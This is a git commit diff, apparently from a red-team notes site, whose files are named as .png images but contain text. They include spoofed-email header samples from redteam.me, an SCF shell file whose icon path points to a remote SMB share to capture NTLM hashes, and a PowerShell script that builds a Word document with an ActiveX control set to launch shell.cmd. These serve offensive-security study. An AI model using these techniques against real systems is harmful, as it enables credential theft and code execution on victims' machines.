first commit

Author: root

.gitbook/assets/account-add.png

@@ -0,0 +1,54 @@
+Delivered-To: mantvydo@gmail.com
+Received: by 2002:ab0:232:0:0:0:0:0 with SMTP id 47csp4855103uas;
+        Tue, 29 Jan 2019 13:59:31 -0800 (PST)
+X-Google-Smtp-Source: ALg8bN5GPgy4/2kmKe8q8kCroUASJBEYQgVuCEvagozf65+qsuui0ZMZZCdBPWCQpyRPn4ZPHb7m
+X-Received: by 2002:ac8:1a92:: with SMTP id x18mr28052057qtj.179.1548799171548;
+        Tue, 29 Jan 2019 13:59:31 -0800 (PST)
+ARC-Seal: i=1; a=rsa-sha256; t=1548799171; cv=none;
+        d=google.com; s=arc-20160816;
+        b=ocaDksuA42+hwvrJwuitSaxl89WYwCNmQTm0spPljGvNH0YbvgFfdIFkDCQ9IjngTZ
+         PWcGE5j6g6te+Dg0e+Y4ihNZ8qMG1doGHveXbbf0NsNMPN6CeD3Y2kplLCn/mv6r8vVY
+         vl1+ME+5z23rnGZQvJZ1VY2i6T04sEOLxdaIWtrq9w55NGlqhLW1U+qmB4C1pzhV1RBS
+         6BV74XeD8MIdWvc5fNqc3awjYM+tQ6hruHtp64p/Nwzdc6JFL3mt+BYNBbr7neaVyC0A
+         i4MhrFA2MbPuhMlUcZa9sgFJK3jdCNY7WensibiQccsqVwURwNCeVlmSSWWklf8z9og2
+         5ZjQ==
+ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816;
+        h=subject:from:dkim-signature:to:message-id:date;
+        bh=+RJ37zbngs83OUUyCgNCYUveGlSXILMY6G6wMcVzG4w=;
+        b=nzsIG10M0CWT95MbAQRtZrPVqhfjyZdWBwqDTgYw4XqjjLLbXgIaDkoj+Smm7Ze1Ug
+         clx5VXs2rwZnnvPnCQ3p+l4+2JakWaY49VdOLa2v2B/jo+yIUsW8Pogpsdx3DaoJOcE8
+         tgaHNMm2Zm041raNFVjKRPqqWWOvppAyb4uztddWqHklhK1w7dsp2+VKYuOqByDbQAPC
+         S346CeEuxfp8vrpDBDcDrCYHm5ZcAiXMbosOgMPs4gELSMSRzkQEmaoYl+EqFQJ3GJ7m
+         rNsUr1xN+/OCTVKaVs8yQm+jAutcYJBr3amXiHJXXk03wIqpPXagy0W94rBITtQyVo4u
+         B80w==
+ARC-Authentication-Results: i=1; mx.google.com;
+       dkim=pass (test mode) header.i=@redteam.me header.s=mail header.b=eh7ARy9T;
+       spf=pass (google.com: domain of olasenor@redteam.me designates 142.93.178.204 as permitted sender) smtp.mailfrom=olasenor@redteam.me;
+       dmarc=pass (p=REJECT sp=REJECT dis=NONE) header.from=redteam.me
+Return-Path: <olasenor@redteam.me>
+Received: from redteam.me (redteam.me. [142.93.178.204])
+        by mx.google.com with ESMTP id b48si709867qtk.45.2019.01.29.13.59.31
+        for <mantvydo@gmail.com>;
+        Tue, 29 Jan 2019 13:59:31 -0800 (PST)
+Received-SPF: pass (google.com: domain of olasenor@redteam.me designates 142.93.178.204 as permitted sender) client-ip=142.93.178.204;
+Authentication-Results: mx.google.com;
+       dkim=pass (test mode) header.i=@redteam.me header.s=mail header.b=eh7ARy9T;
+       spf=pass (google.com: domain of olasenor@redteam.me designates 142.93.178.204 as permitted sender) smtp.mailfrom=olasenor@redteam.me;
+       dmarc=pass (p=REJECT sp=REJECT dis=NONE) header.from=redteam.me
+Date: Tue, 29 Jan 2019 13:59:31 -0800 (PST)
+Message-Id: <5c50ccc3.1c69fb81.50027.b91fSMTPIN_ADDED_MISSING@mx.google.com>
+to: Mantvydas Baranauskas <mantvydo@gmail.com>
+DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple; d=redteam.me; s=mail;
+	t=1548799170; bh=+RJ37zbngs83OUUyCgNCYUveGlSXILMY6G6wMcVzG4w=;
+	h=to:from:subject:From;
+	b=eh7ARy9TVTw1r3i47fuQYxVih0dhl1MC66NzdKinL7eUF1KKjaG3fA8z3X13dupG1
+	 BlfdIwCekfR8dRVkMQkBvBapYUiRXGhSnkdIl+kqjwS1rIgGA/OtHL3Eyr+EL02IFw
+	 dmz41GG4lGl6RUTahwk3WEJy295CaAiVjy4EQZeaJUR8s5IPTHnzmnTtryvc31IZmr
+	 dsoPoPIv+F9mEi/zD5f3IOXkIquv/OAAB98WbF4mQul1k7d9MiaMj1vXTUuRwAeSzW
+	 hCssWNxBgUnye7GQC5HVFIIUM5Vfbk4hQmaxBUUqbJx1UasBvZt3F6YUWRKPh/jPb0
+	 nFvPNScYJKQlw==
+from: Ola Senor <olasenor@redteam.me>
+subject: daily report
+
+Hey Mantvydas,
+As you were requesting last week - attaching as promised the documents needed to keep the project going forward.

.gitbook/assets/account-created.png

@@ -0,0 +1,5 @@
+[Shell]
+Command=2
+IconFile=\\10.0.0.5\share\pentestlab.ico
+[Taskbar]
+Command=ToggleDesktop

.gitbook/assets/account-events.png

@@ -0,0 +1,40 @@
+# target file path
+$filename = [Environment]::GetFolderPath('Desktop') + '\Forms.HTML.docx'
+$progid = 'Forms.HTML:Image.1'
+$clsid = '5512D112-5CC6-11CF-8D67-00AA00BDCE1D'
+$html = '<x type="image" src="https://securify.nl/blog/SFY20180801/packager.emf" action="file:///c|/shell.cmd">'
+
+# load assemblies for changing the docx (zip) file
+[void] [Reflection.Assembly]::LoadWithPartialName('System.IO.Compression.FileSystem')
+[void] [Reflection.Assembly]::LoadWithPartialName('System.IO.Compression')
+
+# create new Word document
+$word = New-Object -ComObject Word.Application
+$word.Visible = $false
+$doc = $word.documents.add()
+
+$shape = $doc.InlineShapes.AddOLEControl($progid)
+
+# save doc & close Word
+$doc.SaveAs($filename)
+$doc.Close($false)
+$word.Quit()
+
+# create temp folder for modifying the docx
+$tmpfolder = "$env:TEMP\" + [System.Guid]::NewGuid()
+$null = New-Item -Type directory -Path $tmpfolder
+
+# unzip and replace ActiveX object
+[System.IO.Compression.ZipFile]::ExtractToDirectory($filename, $tmpfolder)
+Remove-Item "$tmpfolder\word\activeX\activeX1.bin"
+
+$clsid = ([GUID]$clsid).ToByteArray()
+$clsid | Set-Content "$tmpfolder\word\activeX\activeX1.bin" -Encoding Byte
+$html | Add-Content "$tmpfolder\word\activeX\activeX1.bin" -Encoding Unicode
+
+# rezip
+Remove-Item $filename
+[System.IO.Compression.ZipFile]::CreateFromDirectory($tmpfolder, $filename)
+
+# cleanup
+Remove-Item $tmpfolder -Force -Recurse

.gitbook/assets/ads-benign.png

@@ -0,0 +1,38 @@
+Delivered-To: mantvydo@gmail.com
+Received: by 2002:a81:1157:0:0:0:0:0 with SMTP id 84-v6csp5668508ywr;
+        Wed, 3 Oct 2018 03:47:35 -0700 (PDT)
+X-Google-Smtp-Source: ACcGV614wuffoVOsvFkTPPxCiRj0hgFwTIH7y3B4ziIaXfogLFjsoiFyYOdNVChhr+oRcL1axO+a
+X-Received: by 2002:a17:902:a9cc:: with SMTP id b12-v6mr988630plr.198.1538563655360;
+        Wed, 03 Oct 2018 03:47:35 -0700 (PDT)
+ARC-Seal: i=1; a=rsa-sha256; t=1538563655; cv=none;
+        d=google.com; s=arc-20160816;
+        b=qhbzI+R3vHbkqwp2ALOEQ0ItUXU/fA1kEmYln1dBe0CmLELuIfourst4gZVYiU0tAf
+         sRx20Z5Vcqvv9w6s6f2gVp6crlOuoX2cSKJCn/HyRYKiDB5aVKpEYTDjQtGEBRLoL9xm
+         /T8+3PgV6CHy/KowoPeLugKg3t5mIh9pq+Ig8gG+VVKZcFyvUBJa9YEgBgVKcMwew8H6
+         x8WzIB2zyavpZLnbIi6SrtheYZAeSTMTwXRutqxZl0n4O/iZS4Y+ZVdRlYeXFXFNdtMK
+         JFaS1XVLR4hYXOzlQT1IC2yeQlqf+Q3FJukmkDlDTgw91ImfZa0HtQYQoo3LwKotp92Q
+         1HiQ==
+ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816;
+        h=from:date:message-id;
+        bh=hZH42YPrA1C1YyKkQ/LM0S6pyh9p5LGmoqE/s4CGGts=;
+        b=Squ71HtAuuwYHfX+4z63WcgBMoiKbcX5KAQLKwfvlnXuF5QEJNHjfX0GwekViXJIZ5
+         D2v03648ni6W3/b6uXVoecrtX0MZ9Z/Ck+LxcJRi16toE4QfjR6fhX5l9OSKFjgqkst3
+         Exk9yB1iiX8IAoIvnSaT0pQ5UzOov5Yneti3HO8QbzeCnT1/HieLwIhB/d+znryw1mTQ
+         jj/VBlNEGFEJhpXjS7cbQFHQEz3yGl1YTSNB3Kxp9T5a7+ncsW3pOAlfKqNYpVywSlBe
+         s6OUSTZ/bEwVYP3dv9aHmbpOIV6rC8uPgUlm+SKYtlj9xiR9uXTtj21IbA0F1esFx+Up
+         jAQw==
+ARC-Authentication-Results: i=1; mx.google.com;
+       spf=pass (google.com: domain of root@nodspot.com designates 206.189.221.162 as permitted sender) smtp.mailfrom=root@nodspot.com
+Return-Path: <root@nodspot.com>
+Received: from ubuntu-s-1vcpu-1gb-sfo2-01 ([206.189.221.162])
+        by mx.google.com with ESMTP id y11-v6si1190446plg.237.2018.10.03.03.47.35
+        for <mantvydo@gmail.com>;
+        Wed, 03 Oct 2018 03:47:35 -0700 (PDT)
+Received-SPF: pass (google.com: domain of root@nodspot.com designates 206.189.221.162 as permitted sender) client-ip=206.189.221.162;
+Authentication-Results: mx.google.com;
+       spf=pass (google.com: domain of root@nodspot.com designates 206.189.221.162 as permitted sender) smtp.mailfrom=root@nodspot.com
+Message-Id: <20181003104734.1871F42006E@kali>
+Date: Wed,  3 Oct 2018 11:47:28 +0100 (BST)
+From: root <root@nodspot.com>
+
+removing traces like a sir